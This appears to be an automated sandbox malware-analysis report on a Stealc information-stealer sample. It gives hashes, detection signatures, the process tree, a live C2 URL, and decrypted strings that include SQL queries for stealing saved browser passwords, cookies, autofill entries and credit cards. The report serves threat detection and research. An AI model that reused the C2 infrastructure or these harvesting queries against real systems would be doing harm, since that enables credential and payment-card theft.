Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ssB9bjDQPf.exe

Overview

General Information

Sample name:ssB9bjDQPf.exe
renamed because original name is a hash value
Original sample name:26ceb3d9dcc1821192b39eea6832d51d.exe
Analysis ID:1572687
MD5:26ceb3d9dcc1821192b39eea6832d51d
SHA1:d22dae62f3d122acaec58a03550d5d99a9b7cfb4
SHA256:fe7c9c900df7c51f53243053dcf41ee781d284206742952aea704735d8d4a198
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ssB9bjDQPf.exe (PID: 1736 cmdline: "C:\Users\user\Desktop\ssB9bjDQPf.exe" MD5: 26CEB3D9DCC1821192B39EEA6832D51D)
    • 8DF0.tmp.exe (PID: 1280 cmdline: "C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe" MD5: 5DE218396F8C0A36CEE31B8EE4FD0BFE)
      • WerFault.exe (PID: 3500 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1090:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xf88:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.8DF0.tmp.exe.2480e67.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
          3.3.8DF0.tmp.exe.24c0000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            3.2.8DF0.tmp.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              3.3.8DF0.tmp.exe.24c0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                3.2.8DF0.tmp.exe.2480e67.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T18:58:42.967098+010028032742Potentially Bad Traffic192.168.2.849724172.67.179.207443TCP
                  2024-12-10T18:58:44.541123+010028032742Potentially Bad Traffic192.168.2.849725176.113.115.1980TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE_Avira URL Cloud: Label: malware
                  Source: http://92.255.57.89/45c616e921a794b8.phpAvira URL Cloud: Label: malware
                  Source: http://92.255.57.89Avira URL Cloud: Label: malware
                  Source: http://92.255.57.89/TAvira URL Cloud: Label: malware
                  Source: http://92.255.57.89/Avira URL Cloud: Label: malware
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEuAvira URL Cloud: Label: malware
                  Source: http://92.255.57.89/AAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000003.00000003.1561878307.00000000024C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeReversingLabs: Detection: 44%
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeReversingLabs: Detection: 44%
                  Multi AV Scanner detection for submitted file
                  Source: ssB9bjDQPf.exeReversingLabs: Detection: 44%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: ssB9bjDQPf.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: INSERT_KEY_HERE
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 26
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 12
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 20
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: 24
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetProcAddress
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: LoadLibraryA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: lstrcatA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: OpenEventA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CreateEventA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CloseHandle
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Sleep
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetUserDefaultLangID
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: VirtualAllocExNuma
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: VirtualFree
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetSystemInfo
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: VirtualAlloc
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: HeapAlloc
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetComputerNameA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: lstrcpyA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetProcessHeap
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetCurrentProcess
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: lstrlenA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ExitProcess
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GlobalMemoryStatusEx
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetSystemTime
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SystemTimeToFileTime
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: advapi32.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: gdi32.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: user32.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: crypt32.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetUserNameA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CreateDCA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetDeviceCaps
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ReleaseDC
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CryptStringToBinaryA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sscanf
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: VMwareVMware
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: HAL9TH
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: JohnDoe
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DISPLAY
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: %hu/%hu/%hu
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: http://92.255.57.89
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: /45c616e921a794b8.php
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: /697b92cb4e247842/
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: default
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetEnvironmentVariableA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetFileAttributesA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: HeapFree
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetFileSize
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GlobalSize
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CreateToolhelp32Snapshot
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: IsWow64Process
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Process32Next
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetLocalTime
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: FreeLibrary
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetTimeZoneInformation
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetSystemPowerStatus
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetVolumeInformationA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetWindowsDirectoryA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Process32First
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetLocaleInfoA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetUserDefaultLocaleName
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetModuleFileNameA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DeleteFileA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: FindNextFileA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: LocalFree
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: FindClose
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SetEnvironmentVariableA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: LocalAlloc
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetFileSizeEx
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ReadFile
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SetFilePointer
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: WriteFile
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CreateFileA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: FindFirstFileA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CopyFileA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: VirtualProtect
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetLastError
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: lstrcpynA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: MultiByteToWideChar
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GlobalFree
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: WideCharToMultiByte
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GlobalAlloc
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: OpenProcess
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: TerminateProcess
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetCurrentProcessId
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: gdiplus.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ole32.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: bcrypt.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: wininet.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: shlwapi.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: shell32.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: rstrtmgr.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CreateCompatibleBitmap
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SelectObject
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: BitBlt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: DeleteObject
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CreateCompatibleDC
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GdipGetImageEncodersSize
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GdipGetImageEncoders
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GdiplusStartup
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GdiplusShutdown
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GdipSaveImageToStream
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GdipDisposeImage
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GdipFree
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetHGlobalFromStream
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CreateStreamOnHGlobal
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CoUninitialize
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CoInitialize
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CoCreateInstance
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: BCryptDecrypt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: BCryptSetProperty
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: BCryptDestroyKey
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetWindowRect
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetDesktopWindow
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetDC
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CloseWindow
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: wsprintfA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: EnumDisplayDevicesA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetKeyboardLayoutList
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CharToOemW
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: wsprintfW
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RegQueryValueExA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RegEnumKeyExA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RegOpenKeyExA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RegCloseKey
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RegEnumValueA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CryptBinaryToStringA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CryptUnprotectData
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SHGetFolderPathA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: ShellExecuteExA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: InternetOpenUrlA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: InternetConnectA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: InternetCloseHandle
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: HttpSendRequestA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: HttpOpenRequestA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: InternetReadFile
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: InternetCrackUrlA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: StrCmpCA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: StrStrA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: StrCmpCW
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: PathMatchSpecA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: GetModuleFileNameExA
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RmStartSession
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RmRegisterResources
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RmGetList
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: RmEndSession
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3_open
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3_prepare_v2
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3_step
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3_column_text
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3_finalize
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3_close
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3_column_bytes
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: sqlite3_column_blob
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: encrypted_key
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: PATH
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: NSS_Init
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: NSS_Shutdown
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: PK11_FreeSlot
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: PK11_Authenticate
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: PK11SDR_Decrypt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: C:\ProgramData\
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: browser:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: profile:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: url:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: login:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: password:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Opera
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: OperaGX
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Network
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: cookies
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: .txt
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: TRUE
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: FALSE
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: autofill
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: history
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: cc
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: name:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: month:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: year:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: card:
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Cookies
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Login Data
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Web Data
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: History
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: logins.json
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: formSubmitURL
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: usernameField
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: encryptedUsername
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: encryptedPassword
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: guid
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: cookies.sqlite
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: formhistory.sqlite
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: places.sqlite
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: plugins
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Local Extension Settings
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Sync Extension Settings
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: IndexedDB
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Opera Stable
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Opera GX Stable
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: CURRENT
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: chrome-extension_
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: _0.indexeddb.leveldb
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: Local State
                  Source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpackString decryptor: profiles.ini
